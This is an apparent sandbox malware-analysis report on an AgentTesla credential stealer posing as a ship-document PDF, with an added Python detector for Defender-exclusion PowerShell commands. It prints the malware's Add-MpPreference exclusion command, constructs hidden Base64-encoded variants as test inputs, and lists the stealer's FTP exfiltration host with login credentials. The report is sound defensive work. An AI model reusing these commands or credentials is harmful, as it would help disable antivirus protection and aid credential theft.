

Windows Analysis Report
MV BBG MUARA Ship's Particulars.pdf.scr.exe

Overview

General Information

Sample name: MV BBG MUARA Ship's Particulars.pdf.scr.exe
Analysis ID: 1560137
MD5: 1779ee90e122ebe86f1bddc4ec06440d
SHA1: e8842b83a180e7589e366bd61b08f59a87a71734
SHA256: 941559a78b6e1caf39212048e7f62723e5f283d1942858cc07a339d6d6b24362
Tags: exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • MV BBG MUARA Ship's Particulars.pdf.scr.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe" MD5: 1779EE90E122EBE86F1BDDC4EC06440D)
    • powershell.exe (PID: 3288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
Source | Rule | Description | Author | Strings
00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 7 entries shown)
Source | Rule | Description | Author | Strings
0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x312d3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31345:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x313cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31461:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x314cb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3153d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x315d3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31663:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2e6c6:$s2: GetPrivateProfileString
  • 0x2ddc5:$s3: get_OSFullName
  • 0x2f403:$s5: remove_Key
  • 0x2f592:$s5: remove_Key
  • 0x30473:$s6: FtpWebRequest
  • 0x312b5:$s7: logins
  • 0x31827:$s7: logins
  • 0x3450a:$s7: logins
  • 0x345ea:$s7: logins
  • 0x35ee6:$s7: logins
  • 0x35184:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 of 17 entries shown)

                  System Summary

Source: Process started | Three Sigma rules matched the same process-creation event: two authored by Florian Roth (Nextron Systems) and one by Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Event data:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
  CommandLine: same as Command
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
  ParentImage: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
  ParentProcessId: 6712
  ParentProcessName: MV BBG MUARA Ship's Particulars.pdf.scr.exe
  ProcessCommandLine: same as Command
  ProcessId: 3288
  ProcessName: powershell.exe
  Note that Command names the System32 powershell.exe while Image and NewProcessName resolve to SysWOW64: the parent is a 32-bit PE (see "Uses 32bit PE files"), so WoW64 file-system redirection rewrites the path at launch. Detections keyed on the System32 image path alone would miss this process; match on the command line or on both paths.
                  No Suricata rule has matched
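The Sigma matches above fire on the clear-text Add-MpPreference -ExclusionPath command line recorded in the process tree; one of them (see "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet") uses Sigma's base64offset modifier, which finds the cmdlet name even when it is hidden inside a Base64 -EncodedCommand blob. The Python below is an added example, not part of the Joe Sandbox report and not Sigma project code: it reimplements that modifier and applies both checks to constructed command lines (the report's own PowerShell invocation as recorded for PID 3288, two hypothetical encoded variants built inline, and a benign Get-MpPreference call). The cmdlet and parameter lists are assumptions, and the UTF-16LE handling generalises the check to the encoding powershell.exe expects for -EncodedCommand.

```python
"""Flag PowerShell command lines that add Windows Defender exclusions.

Added example, not part of the sandbox report or of the Sigma project. It
reproduces the logic of Sigma's `base64offset` modifier so the cmdlet name is
found even inside a Base64 -EncodedCommand blob, and applies the clear-text
check that fires on the command line recorded in this report.
"""
from __future__ import annotations

import base64
import re

# Assumed cmdlet and parameter names (both casings are tried for the Base64 check).
MPPREF_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionProcess",
                    "-ExclusionExtension", "-ExclusionIpAddress")
# powershell.exe accepts -e, -ec, -en, -enc ... -EncodedCommand; the option must be
# followed by whitespace so -ExecutionPolicy and friends are not mistaken for it.
ENCODED_RE = re.compile(r"(?i)\s-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)")


def base64_offsets(value: bytes) -> list[str]:
    """Return the three Base64 fragments that represent `value` at any alignment.

    Base64 works on 3-byte groups, so the same bytes encode differently depending
    on where they start. Shift the value by 0, 1 and 2 filler bytes, encode, then
    cut the leading/trailing characters whose value also depends on neighbouring
    bytes (and the '=' padding). A substring search for any fragment then finds
    `value` anywhere inside a Base64 blob. Same scheme as Sigma's base64offset.
    """
    start = (0, 2, 3)        # leading chars polluted by the i filler bytes
    end = (None, -3, -2)     # trailing chars polluted by padding, by (len + i) % 3
    fragments = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + value).decode("ascii")
        fragments.append(enc[start[i]:end[(len(value) + i) % 3]])
    return fragments


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the script carried by -EncodedCommand (UTF-16LE, Base64), if any."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def detect_defender_exclusion(cmdline: str) -> dict:
    """Classify one process-creation command line; returns every indicator hit."""
    hits = []
    low = cmdline.lower()
    # 1. Clear-text cmdlet plus an exclusion parameter (the case in this report).
    if any(c.lower() in low for c in MPPREF_CMDLETS) and \
            any(p.lower() in low for p in EXCLUSION_PARAMS):
        hits.append("cleartext_mppreference_exclusion")
    # 2. Cmdlet name Base64-encoded at any alignment, as ASCII or as the UTF-16LE
    #    that powershell.exe expects for -EncodedCommand.
    for cmdlet in MPPREF_CMDLETS:
        for name in (cmdlet, cmdlet.lower()):
            for label, raw in (("ascii", name.encode()), ("utf16le", name.encode("utf-16-le"))):
                if any(frag in cmdline for frag in base64_offsets(raw)):
                    hits.append(f"base64offset_{label}:{name}")
    # 3. Decode the blob and re-run the cmdlet check on the recovered plaintext.
    decoded = decode_encoded_command(cmdline)
    if decoded and any(c.lower() in decoded.lower() for c in MPPREF_CMDLETS):
        hits.append("decoded_encodedcommand_mppreference")
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits, "suspicious": bool(hits)}


def _encode(script: str) -> str:
    """Build a hypothetical `powershell -enc` invocation the way an operator would."""
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events. The first is the command line recorded in this report
# (PID 3288); the two encoded ones are hypothetical, built here so the Base64 path
# is exercised at two different 3-byte alignments; the last is benign.
REPORT_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                  'Add-MpPreference -ExclusionPath '
                  '"C:\\Users\\user\\Desktop\\MV BBG MUARA Ship\'s Particulars.pdf.scr.exe"')
SAMPLE_EVENTS = [
    REPORT_CMDLINE,
    _encode("Add-MpPreference -ExclusionPath 'C:\\Users\\Public'"),   # cmdlet at byte 0
    _encode("cd C:\\; Add-MpPreference -ExclusionProcess 'a.exe'"),   # cmdlet at byte 16
    "powershell.exe Get-MpPreference | Select-Object ExclusionPath",  # benign
]


def scan(events=SAMPLE_EVENTS) -> list[dict]:
    """Run the detector over a list of command lines."""
    return [detect_defender_exclusion(e) for e in events]


if __name__ == "__main__":
    for r in scan():
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["hits"], r["cmdline"][:70])
```

The second encoded sample places the cmdlet 16 bytes into the UTF-16LE stream, so only the shifted fragment matches; that is the alignment problem base64offset exists to solve, and why a single plain base64 of the keyword is not a sufficient indicator. Step 3 is the belt-and-braces check: decoding the blob also catches obfuscations the fragment search cannot, such as string concatenation inside the script.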


                  AV Detection

Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Joe Sandbox ML: detected
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4x nop then jmp 06C99175h | 0_2_06C991BC

                  Networking

Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 50.87.144.157
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: beirutrest.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://beirutrest.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4192547572.000000000641A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822825090.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.comhs
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2

                  System Summary

Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: initial sample | Static PE information: Filename: MV BBG MUARA Ship's Particulars.pdf.scr.exe
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_00B5D51C
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C9AF01
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C91E70
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C94E30
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C95268
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C971E8
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C949F8
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C96900
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_06C96910
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051EE5B8
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051EDD38
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051E3E40
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051E4A58
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051EAA9A
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051E4188
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06908970
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0690B5F8
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06917D80
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_069155A0
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_069165F0
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0691B238
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06913060
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0691C190
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_069176A0
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06915CE3
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0691E3A8
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06910040
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_06910006
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0691055C
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822920441.00000000050B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718857892.0000000000120000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGfhv.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823913098.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1819458942.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
